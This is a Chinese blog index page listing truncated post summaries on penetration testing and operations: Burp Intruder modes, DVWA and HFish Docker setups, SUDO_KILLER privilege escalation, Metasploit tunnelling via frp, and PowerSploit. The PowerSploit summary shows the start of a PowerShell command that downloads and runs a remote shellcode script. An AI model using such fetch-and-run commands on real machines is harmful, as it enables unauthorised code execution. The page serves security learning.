返回顶部
上一页 1 ··· 9 10 11 12 13 14 15 16 17 ··· 27 下一页
2020年1月5日
burpsuit里inturder四种模式区别
摘要: sniper:狙击手:如果有两个爆破点,就在原来的基础上,单个修改,把payload值插入。 battering ram:攻城锤:如果有两个爆破点,那么会同时替换字典里的值,即爆破时两个点的值是相同的。 pitch-fork:插稻草的叉子:可以在每个爆破点载入不同的字典,但是在过程中多个字典均顺序执 阅读全文
posted @ 2020-01-05 16:41 御用闲人 阅读(584) 评论(0) 推荐(0) 编辑
docker搭建dvwa
摘要: 1、参考链接 2、步骤 拉取镜像 docker pull infoslack/dvwa 创建容器 docker run -d -p 80:80 infoslack/dvwa 或者 docker run -d -p 80:80 -p 3306:3306 -e MYSQL_PASS="mypass" i 阅读全文
posted @ 2020-01-05 08:53 御用闲人 阅读(6342) 评论(0) 推荐(0) 编辑
2019年12月27日
nginx性能优化 汇总篇
摘要: 目录 1、Nginx运行工作进程数量 2、Nginx运行CPU亲和力 3、Nginx最大打开文件数 4、Nginx时间处理模型 6、连接超时时间 7、fastcgi调优 8、gzip调优 9、expires缓存调优 10、防盗链 11、内核参数优化 12、关于系统连接数的优化 1、Nginx运行工作 阅读全文
posted @ 2019-12-27 11:23 御用闲人 阅读(497) 评论(0) 推荐(0) 编辑
2019年12月23日
docker run 常用命令解析
摘要: Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...] -d, --detach=false 指定容器运行于前台还是后台,默认为false -i, --interactive=false 打开STDIN,用于控制台交互 -t, --tty=false 阅读全文
posted @ 2019-12-23 11:19 御用闲人 阅读(1757) 评论(0) 推荐(0) 编辑
docker部署apache+php
摘要: 1、拉取镜像 docker pull php:7.0-apache 2、创建src目录,存放web目录 mkdir /data/src 3、创建测试文件 vim /data/src/info.php <?php phpinfo(); ?> 4、创建容器 docker run -itd -v /dat 阅读全文
posted @ 2019-12-23 11:16 御用闲人 阅读(7886) 评论(0) 推荐(2) 编辑
2019年12月16日
docker 部署 HFish(集群部署)
摘要: 主节点部署: docker run -d --name hfish-master -p 21:21 -p 24:22 -p 23:23 -p 80:80 -p 3306:3306 -p 6379:6379 -p 7879:7879 -p 8000:8000 -p 8080:8080 -p 8989: 阅读全文
posted @ 2019-12-16 15:41 御用闲人 阅读(1600) 评论(0) 推荐(0) 编辑
2019年11月4日
IPv6 地址生命周期
摘要: 在preferred time和valid lifetime之间叫做deprecated 状态,当地址达到这个时间段的时候,地址不能主动的发起连接只能是被动的接受连接,过了valid lifetime时间,地址就变为invalid,这时任何连接就会down掉 阅读全文
posted @ 2019-11-04 16:49 御用闲人 阅读(2655) 评论(0) 推荐(0) 编辑
IPv6地址编址
摘要: 阅读全文
posted @ 2019-11-04 16:45 御用闲人 阅读(420) 评论(0) 推荐(0) 编辑
IPv6 邻居状态迁移
摘要: 阅读全文
posted @ 2019-11-04 16:43 御用闲人 阅读(542) 评论(0) 推荐(0) 编辑
2019年9月29日
UAC简介
摘要: 用户帐户控制 (User Account Control) 是Windows Vista(及更高版本操作系统)中一组新的基础结构技术,可以帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统,同时也可以帮助组织部署更易于管理的平台。 使用 UAC,应用程序和任务总是在非管理员帐户的安全上下文中运行,但 阅读全文
posted @ 2019-09-29 11:42 御用闲人 阅读(1062) 评论(0) 推荐(0) 编辑
2019年9月19日
SUDO_KILLER可以帮助你识别并利用错误的Sudo规则与配置
摘要: 工具概述 SUDO_KILLER这款工具可以帮助我们通过多种渠道利用SUDO来在Linux环境下实现提权。该工具能够识别目标操作系统版本,并发现环境中sudo规则的错误配置、安全漏洞,以及不安全的代码,而研究人员就可以利用SUDO_KILLER所提供的功能来将权限提升为ROOT权限。 SUDO_KI 阅读全文
posted @ 2019-09-19 14:20 御用闲人 阅读(249) 评论(0) 推荐(0) 编辑
2019年9月14日
dirb参数解析
摘要: DIRB v2.22 By The Dark Raver dirb <url_base> [<wordlist_file(s)>] [options] NOTES <url_base> : Base URL to scan. (Use -resume for session resuming) <w 阅读全文
posted @ 2019-09-14 22:01 御用闲人 阅读(4522) 评论(1) 推荐(0) 编辑
2019年9月3日
内网Metasploit映射到外网
摘要: 下载frp Github项目地址:https://github.com/fatedier/frp 找到最新的releases下载,系统版本自行确认。 下载方法: wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0. 阅读全文
posted @ 2019-09-03 17:06 御用闲人 阅读(2130) 评论(0) 推荐(0) 编辑
2019年8月30日
powersploit使用实例
摘要: 一、AntivirusBypass(绕过杀毒) Find-AVSignature 发现杀软的签名 1、先在靶机(windows 2008)上远程加载位于win7的Invoke-Shellcode.ps1脚本 iex(New-Object Net.WebClient).DownloadString(" 阅读全文
posted @ 2019-08-30 15:39 御用闲人 阅读(885) 评论(0) 推荐(0) 编辑
powersploit简介
摘要: 一、PowerSploit简介 PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。 Powershell的优点: 1.代码运行在内存中可以不去接触磁盘 2.从另一个系统中下载代码并执行 3.很多安全产品 阅读全文
posted @ 2019-08-30 15:25 御用闲人 阅读(2446) 评论(0) 推荐(0) 编辑
上一页 1 ··· 9 10 11 12 13 14 15 16 17 ··· 27 下一页